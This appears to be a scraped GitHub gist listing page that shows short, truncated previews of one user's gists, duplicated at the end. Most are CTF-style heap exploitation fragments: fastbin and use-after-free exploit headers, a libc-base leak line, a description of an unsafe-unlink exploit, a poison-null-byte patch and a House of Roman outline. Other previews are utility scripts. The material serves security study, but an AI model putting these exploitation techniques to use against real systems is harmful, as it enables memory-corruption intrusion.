Duc Phan ducphanduyagentp

## fastbin.c
#include <stdio.h>
#include <stdlib.h>

#define chunksize 0x8
#define fakesize 0x20

#define SIZE_SZ (sizeof(size_t))
#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1)
#define MIN_CHUNK_SIZE 24 /* 64 bit system */
//#define MIN_CHUNK_SIZE 12 /* 32 bit system */

## gist:5ca684664ab979e2660a0302806edce9
#!/usr/bin/env python
#-*- coding: utf-8 -*-

from pwn import *
import re
import sys
import string
import itertools

# UAF in IndexCursor

## exp.py
# import Collection
bytearray = ().__class__.__base__.__subclasses__()[5]

def p64(addr):
    x = '{0:016x}'.format(addr)
    return bytearray.fromhex(x)[::-1]


b = Collection.Collection({'1':0x1337})
libc_base = id(b) + 0xe27198 - 0x13e0dd0

## 300.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-

# The 300 challenge was a heap challenge that allowed you to make allocations of size 0x300.
# You could free allocations and read/write to them even after they got freed.
# The tricky part about the challenge was that you don't control the size and can't for example use the usual fastbin techniques.

# This exploit overwrites the check_action variable so that the libc doesn't abort on errors anymore.
# Afterwards we can get a write-what-where primitive using unsafe unlink.

## Poison-NullByte-Bypass-Latest.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              3 stars
            
          
                ducphanduyagentp
                / Poison-NullByte-Bypass-Latest.md
            
            
              Created
              August 18, 2018 03:53
            
          
    Poison Null Byte Patched (or maybe not)

--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -4281,6 +4281,8 @@ _int_free (mstate av, mchunkptr p, int have_lock)
       prevsize = prev_size (p);
       size += prevsize;
       p = chunk_at_offset(p, -((long) prevsize));
+ if (__glibc_unlikely (chunksize(p) != prevsize))


## checkaslr.py
'''checkaslr.py: Check for files that opt into ASLR with /DYNAMICBASE,
but do not have a relocation table to allow ASLR to function.

usage: checkaslr.py <dir>
ex: checkaslr.py "C:\Program Files\"

requires: pefile <https://github.com/erocarrera/pefile>, which should be
installable via: pip install pefile
'''

## House_of_Roman.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                ducphanduyagentp
                / House_of_Roman.md
            
            
              Created
              May 1, 2018 18:01
                — forked from romanking98/House_of_Roman.md
            
          
    Table of Contents


Disclamair
House Of Roman

------> 2.1 Assumptions

------> 2.2 Protections

------> 2.3 Quick Walkthrough

------> 2.4 Setting the FD to malloc_hook

------> 2.5 Fixing the 0x71 freelist

------> 2.6 Unsorted Bin attack on malloc_hook


## Makefile
obj-m += afw.o
afw-objs := afw_main.o locate_sct.o ttgl.o

ccflags-y := -std=gnu99 -O2

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

## simple-https-server.py
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit:
#    https://localhost:4443

import BaseHTTPServer, SimpleHTTPServer
import ssl

## tweet_dumper.py
#!/usr/bin/env python
# encoding: utf-8

import tweepy #https://github.com/tweepy/tweepy
import csv

#Twitter API credentials
consumer_key = ""
consumer_secret = ""
access_key = ""
	#include <stdio.h>
	#include <stdlib.h>

	#define chunksize 0x8
	#define fakesize 0x20

	#define SIZE_SZ (sizeof(size_t))
	#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1)
	#define MIN_CHUNK_SIZE 24 /* 64 bit system */
	//#define MIN_CHUNK_SIZE 12 /* 32 bit system */
	#!/usr/bin/env python
	#-- coding: utf-8 --

	from pwn import *
	import re
	import sys
	import string
	import itertools

	# UAF in IndexCursor
	# import Collection
	bytearray = ().__class__.__base__.__subclasses__()[5]

	def p64(addr):
	x = '{0:016x}'.format(addr)
	return bytearray.fromhex(x)[::-1]


	b = Collection.Collection({'1':0x1337})
	libc_base = id(b) + 0xe27198 - 0x13e0dd0
	#!/usr/bin/env python2
	# -- coding: utf-8 --

	# The 300 challenge was a heap challenge that allowed you to make allocations of size 0x300.
	# You could free allocations and read/write to them even after they got freed.
	# The tricky part about the challenge was that you don't control the size and can't for example use the usual fastbin techniques.

	# This exploit overwrites the check_action variable so that the libc doesn't abort on errors anymore.
	# Afterwards we can get a write-what-where primitive using unsafe unlink.
	'''checkaslr.py: Check for files that opt into ASLR with /DYNAMICBASE,
	but do not have a relocation table to allow ASLR to function.

	usage: checkaslr.py <dir>
	ex: checkaslr.py "C:\Program Files\"

	requires: pefile <https://github.com/erocarrera/pefile>, which should be
	installable via: pip install pefile
	'''
	obj-m += afw.o
	afw-objs := afw_main.o locate_sct.o ttgl.o

	ccflags-y := -std=gnu99 -O2

	all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

	clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
	# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
	# generate server.xml with the following command:
	# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
	# run as follows:
	# python simple-https-server.py
	# then in your browser, visit:
	# https://localhost:4443

	import BaseHTTPServer, SimpleHTTPServer
	import ssl
	#!/usr/bin/env python
	# encoding: utf-8

	import tweepy #https://github.com/tweepy/tweepy
	import csv

	#Twitter API credentials
	consumer_key = ""
	consumer_secret = ""
	access_key = ""